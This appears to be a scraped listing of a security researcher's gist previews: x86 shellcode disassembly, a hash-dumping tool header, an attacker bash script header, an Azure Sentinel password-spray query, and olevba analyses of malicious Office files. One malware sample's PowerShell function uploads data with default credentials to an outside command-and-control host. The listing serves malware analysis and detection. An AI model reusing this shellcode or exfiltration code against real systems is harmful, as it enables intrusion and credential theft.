John Lambert JohnLaTwC

0000000: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000010: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000020: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000030: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000040: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000050: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000060: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000070: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000080: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
0000090: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL
00000000 FC CLD
00000001 E882000000 CALL -FFFFFF78
00000006 60 PUSHA
00000007 89E5 MOV EBP,ESP
00000009 31C0 XOR EAX,EAX
0000000B 648B5030 MOV EDX,DWORD PTR FS:[EAX+30]
0000000F 8B520C MOV EDX,DWORD PTR [EDX+0C]
00000012 8B5214 MOV EDX,DWORD PTR [EDX+14]
00000015 8B7228 MOV ESI,DWORD PTR [EDX+28]
00000018 0FB74A26 MOVZX ECX,WORD PTR [EDX+26]
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description: Performs various techniques to dump hashes from the
# remote machine without executing any agent there.
# For SAM and LSA Secrets (including cached creds)
# we try to read as much as we can from the registry
JohnLaTwC / bashscript.sh
Created May 6, 2019 14:54
Bash script: 077d51016727216dd6216a3722353be274288d411a6295a5d804d251dacd88fc
#!/bin/bash
# Pins the interpreter and the command search path for the rest of the script
# before anything else runs; PATH is restricted to the listed system
# directories. The header mirrors a cron-style environment (the author's own
# comment below calls this a "job copy") — the remainder of the script is not
# shown in this preview, so confirm against the full file.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
#This is the Old-ReBuild Lady job copy
#
#Goal:
# The goal of this campaign is as follows;
# - To keep the internet safe.
# - To keep them hackers from causing real damage to organisations.
# - We know you feel We are a potential threat, well We ain't.
JohnLaTwC / attack.csl
Created May 7, 2019 16:58
Azure Sentinel Password spray query
// Client IPs with at least one successful sign-in (UserLoggedIn) recorded in
// OfficeActivity during the last 30 days.
let valid_logons = (OfficeActivity
| where TimeGenerated > ago(30d)
| where Operation == 'UserLoggedIn'
| summarize by ClientIP);
// Client IPs that produced sign-in failures (UserLoginFailed) in the same
// window but never a success: the anti-join removes every IP present in
// valid_logons. Note the consequence for the spray detection built on this
// set: an IP that succeeded even once in the 30-day window is excluded here,
// so a spray that eventually lands a valid credential drops out of this list.
let only_invalid_logons = (OfficeActivity
| where TimeGenerated > ago(30d)
| where Operation == 'UserLoginFailed'
| summarize by ClientIP)
| join kind=anti (valid_logons) on ClientIP;
OfficeActivity
function sxuveww( $zgzbjie ){
$jcavxhj = New-Object System.Net.WebClient;
$jcavxhj.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$jcavxhj.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
$jcavxhj.Encoding = [System.Text.Encoding]::UTF8;
try{
$seezzhbd = $jcavxhj.UploadString( "http://surv.surviveandthriveparenting.com/", "guid=temp_2163694146&" + $zgzbjie );
return $seezzhbd;
}catch{};
return $false;
## uploaded by @JohnLaTwC
## Sample hash: 26f5d965bd75023f0582303e76b513da87eca4f62279d6c7b7f8f7f37b97391f
import subprocess
import re
import binascii
import socket
import struct
import threading
import os
olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
JohnLaTwC / VbaProject.OTM
Created November 13, 2019 01:03
Malicious OTM file 7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4 related to a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
## uploaded by @JohnLaTwC
## thx @MalwareRE
## see https://www.virustotal.com/gui/file/7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4/detection
olevba 0.54.2 on Python 3.7.2 - http://decalage.info/python/oletools
===============================================================================
7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4\7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisOutlookSession.cls
JohnLaTwC / 4d09c97c9774c2572a63d38582cb1c1537d734d2cf496099218a14fd842a59dd
Created December 4, 2019 15:01
oletools output on 4d09c97c9774c2572a63d38582cb1c1537d734d2cf496099218a14fd842a59dd
olevba 0.55.1 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: 4d09c97c9774c2572a63d38582cb1c1537d734d2cf496099218a14fd842a59dd
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible
' 0085 11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible